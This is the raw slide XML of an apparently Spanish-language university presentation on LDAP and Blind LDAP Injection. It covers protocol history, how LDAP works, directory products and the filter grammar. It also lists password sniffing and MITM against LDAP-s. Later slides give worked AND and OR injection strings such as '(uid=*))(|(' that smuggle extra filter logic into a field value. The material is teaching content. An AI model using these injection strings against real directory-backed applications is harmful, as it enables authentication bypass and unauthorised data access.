              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Esquema extensible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Objetos con Clase y Atributos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Espacio de nombres OID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Herencia de Clase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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LDAP?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definición de un protocolo sobre TCP/IP para acceso a directorios </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>La implementación sencilla de DAP (OSI), creada en 1993 con la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>RFC 1487</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> para acceso a directorios X.500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se empezó a popularizar con la Versión 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>RFC 1777</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. Actualmente en Versión 3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RFC 4511</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se desarrollo pensando en solventar la problemática generada por la proliferación de directorios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>NO es un directorio ni una Base de datos ni un almacén de información</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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problemas resuelve?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2910" y="1142984"/>
            <a:ext cx="7858180" cy="4665663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Unificación de Directorios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Normalización de los datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Gestión consistente y centralizada</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Mejor y mas consistente experiencia de usuario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Seguridad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>¿Como?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Diseñado para albergar directorios de propósito general</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Protocolo Sencillo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Arquitectura distribuida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Seguridad (Versión 3. Acceso-TLS, Autenticación-SASL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Estándar abierto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> Solicitud de funcionalidad y esquema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Internalización (UTF-8)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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Funcionamiento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1836" y="1142984"/>
            <a:ext cx="7027862" cy="5010929"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Servidor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Debe de proporcionar información estándar de su “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>RootDSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Escucha en el puerto 389 (636 vía SSL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Puede negociar o requerir seguridad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Cliente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Primero se ha de conectar al servidor LDAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Recibe del Servidor  un Mensaje de Resultado estándar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Mensaje</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Hace que todas las comunicaciones sean uniformes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>El ID del mensaje mantiene el registro del cliente y solicitud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Detalles de control opcionales</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Las solicitudes que realiza el cliente son Conexión, Añadir, Buscar, Borrar y Modificar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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Expansión de LDAP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Implementado por:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>- Microsoft (ADAM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Novell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Directory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-Novell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>iPlanet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>OpenLDAP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Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Esta en cualquier organización que utilice alguno de estas soluciones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Como directorio de validación para muchos entornos WEB.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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ADAM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4035" name="Picture 2" descr="D:\Universidad\Blind LDAP Injection\Imagen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0" y="1176356"/>
            <a:ext cx="7834313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MITO IV: Es cosa de la gente de Sistemas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="5 Imagen" descr="ve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817" y="5936057"/>
            <a:ext cx="1105054" cy="666843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848255" y="6238141"/>
            <a:ext cx="6984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http://www.verizonbusiness.com/resources/security/databreachreport.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="11 Imagen" descr="violac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146" y="1610139"/>
            <a:ext cx="8219180" cy="3915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OpenLDAP</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45059" name="Picture 2" descr="D:\Universidad\Blind LDAP Injection\Imagen_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1928813"/>
            <a:ext cx="8058150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Conexiones LDAP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CAIN &amp; LDAP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Sniffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> LDAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Recogida de certificados servidores LDAP-s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>MITM LDAP-s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="D:\Universidad\Blind LDAP Injection\LDAP MITM\imagen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229" y="3019518"/>
            <a:ext cx="8059737" cy="2486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Singelsainon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4301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LDAP: Base de datos Jerarquica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Clases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Objetos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Herencia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Contenedores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Búsqueda: LDAP Search Filters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RFC: 4515</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001836" y="1285860"/>
            <a:ext cx="7027862" cy="4665663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = LPAREN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filtercomp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> RPAREN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filtercomp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = and / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>item</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t>and = AMPERSAND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filterlist</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = VERTBAR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filterlist</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = EXCLAMATION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filter</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filterlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = 1*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filter</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = simple / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>present</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> / extensible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t>simple = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filtertype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>assertionvalue</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>filtertype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>equal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>approx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>greaterorequal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>lessorequal</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>equal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = EQUALS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>approx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = TILDE EQUALS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>greaterorequal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = RANGLE EQUALS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>lessorequal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" b="0" dirty="0"/>
              <a:t> = LANGLE EQUALS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AND LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642910" y="1488250"/>
            <a:ext cx="7858180" cy="4665663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s-ES" sz="3600" i="1" dirty="0"/>
              <a:t>(&amp;(atributo1=valor1)(atributo2=valor2))</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ejemplo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0"/>
              <a:t>(&amp;(directorio=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>nombre_directorio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>nivel_seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0"/>
              <a:t>=bajo))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2400" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0"/>
              <a:t>Inyección:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0"/>
              <a:t>(&amp;(directorio=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1" i="1" dirty="0" err="1"/>
              <a:t>almacen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1" i="1" dirty="0" err="1"/>
              <a:t>nivel_seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>=alto))(|(directorio=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1" i="1" dirty="0" err="1"/>
              <a:t>almacen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>nivel_seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" i="1" dirty="0"/>
              <a:t>=bajo))</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/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 LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="1488250"/>
            <a:ext cx="7929618" cy="4665663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s-ES" sz="3600" i="1" dirty="0"/>
              <a:t>(|(atributo1=valor1)(atributo2=valor2))</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ejemplo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>=D*)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>Groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>Inyección:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>(|(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0" err="1"/>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="1" dirty="0"/>
              <a:t>=*))(|(</a:t>
            </a:r>
            <a:r>
